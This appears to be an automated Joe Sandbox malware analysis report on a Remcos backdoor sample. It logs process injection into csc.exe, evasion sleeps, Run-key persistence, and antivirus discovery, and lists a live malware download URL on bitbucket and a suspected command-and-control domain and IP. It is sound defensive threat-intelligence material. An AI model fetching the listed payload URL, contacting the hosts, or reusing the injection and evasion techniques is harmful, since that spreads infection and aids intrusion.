              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -55344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -55234s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7548Thread sleep time: -567000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59762s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59653s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59533s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59375s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59263s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59152s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -59029s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58921s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58812s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7692Thread sleep time: -58697s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58994Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58883Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58771Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58202Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55682Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 567000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59762Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59653Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59533Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59263Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59152Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59029Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58697Jump to behavior
              Source: csc.exe, 00000003.00000002.2630930311.0000000009892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeAPI call chain: ExitProcess graph end nodegraph_1-14721
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0041343A ___report_gsfailure,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041343A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0041343A ___report_gsfailure,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041343A
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_00415AE9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00415AE9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4760000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4760000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4760000Jump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4995008Jump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: GetLocaleInfoW,_swscanf,1_2_0040EC80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0041C45E GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0041C45E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: csc.exe, 00000003.00000002.2628585143.0000000004D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		31
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              System Time Discovery              		Remote Services11
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		11
              Disable or Modify Tools              		LSASS Memory141
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API              		1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		141
              Virtualization/Sandbox Evasion              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		31
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets134
              System Information Discovery              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              4JwhvqLe8n.exe42%ReversingLabsWin32.Backdoor.Remcos

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bitbucket.org
              		185.166.143.49
              		truefalse
                		high
                navegacionseguracol24vip.org
                		181.131.217.244
                		truefalse
                  		high
                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                  		217.20.58.100
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://bitbucket.org/facturacioncol/fact/downloads/null.exefalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netcsc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-neticsc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJcsc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://bitbucket.orgcsc.exe, 00000003.00000002.2629450491.0000000006EF7000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/11564914/23354;csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      http://bitbucket.orgcsc.exe, 00000003.00000002.2629450491.0000000006F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        181.131.217.244
                                        		navegacionseguracol24vip.orgColombia
                                        		13489EPMTelecomunicacionesSAESPCOfalse
                                        185.166.143.49
                                        		bitbucket.orgGermany
                                        		16509AMAZON-02USfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1573906
                                        Start date and time:2024-12-12 17:51:24 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 16s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:4JwhvqLe8n.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9.exe
                                        Detection:MAL
                                        Classification:mal96.evad.winEXE@3/1@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 72%
                                        • Number of executed functions: 176
                                        • Number of non-executed functions: 57
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 20.12.23.50
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: 4JwhvqLe8n.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        11:52:48API Interceptor848398x Sleep call for process: csc.exe modified
                                        17:52:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
                                        17:53:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        181.131.217.244d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                          fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                              ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                  sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                      x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                        VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                          ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                            185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                            • jasonj002.bitbucket.io/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            navegacionseguracol24vip.orgd7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            bitbucket.orgfIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.48
                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.48
                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.50
                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.49
                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.48
                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comNOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                            • 217.20.58.100
                                                            OR8Ti8rf8h.exeGet hashmaliciousAveMaria, DcRat, StormKitty, VenomRATBrowse
                                                            • 217.20.58.100
                                                            Event Schedule.xlsxGet hashmaliciousUnknownBrowse
                                                            • 217.20.58.100
                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 217.20.58.98
                                                            Tyler_In service Agreement889889.pdfGet hashmaliciousUnknownBrowse
                                                            • 217.20.58.101
                                                            https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnkGet hashmaliciousUnknownBrowse
                                                            • 84.201.211.22
                                                            Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                            • 217.20.58.99
                                                            Carisls Open Benefits Enrollment.emlGet hashmaliciousunknownBrowse
                                                            • 217.20.58.101
                                                            Ou1b9NGTq8.dllGet hashmaliciousUnknownBrowse
                                                            • 217.20.58.98
                                                            CID5B21A97B8635.pdfGet hashmaliciousCaptcha PhishBrowse
                                                            • 217.20.58.101

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            EPMTelecomunicacionesSAESPCOd7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                            • 181.131.217.244
                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                            • 181.131.217.244
                                                            AMAZON-02USfIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.48
                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.48
                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                            • 54.231.193.17
                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.49
                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.48
                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.50
                                                            hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0efIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.49
                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.49
                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.49
                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                            • 185.166.143.49
                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49
                                                            hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                            • 185.166.143.49

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\4JwhvqLe8n.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):979567344
                                                            Entropy (8bit):0.03687271612861637
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:562A60041F05642EC1385D4485B2367A
                                                            SHA1:73084B32C52D7B55DEAC6F80C550F2F6B1E43998
                                                            SHA-256:7B4BE96B41FCEAC779AFE4F8A90E29727DC069E2ABAB8978652A9B5A5176D884
                                                            SHA-512:8E918EA5F916947F3FDD4F81900CAA6B969CD5D3F062B5928B72A4BA1EEE1B5DFABDFE7DA2F8EA5A3DB4FED261907365F7456CB2D428852B04DC2EA4EDB9BF7F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8)4.|HZ.|HZ.|HZ.g..jHZ.g...HZ.g..GHZ.u0.qHZ.|H[..HZ.g...kHZ.g...}HZ.g..}HZ.Rich|HZ.........................PE..L......d.................T... &......X.......p....@...........................(...........@.....................................x....@...s%..........~..`(......."...r..............................P...@............p...............................text....`.......T.................. ..`.rdata.......p.......X..............@..@.data....@..........................@....rsrc....s%..@...t%.................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.05725668491521
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
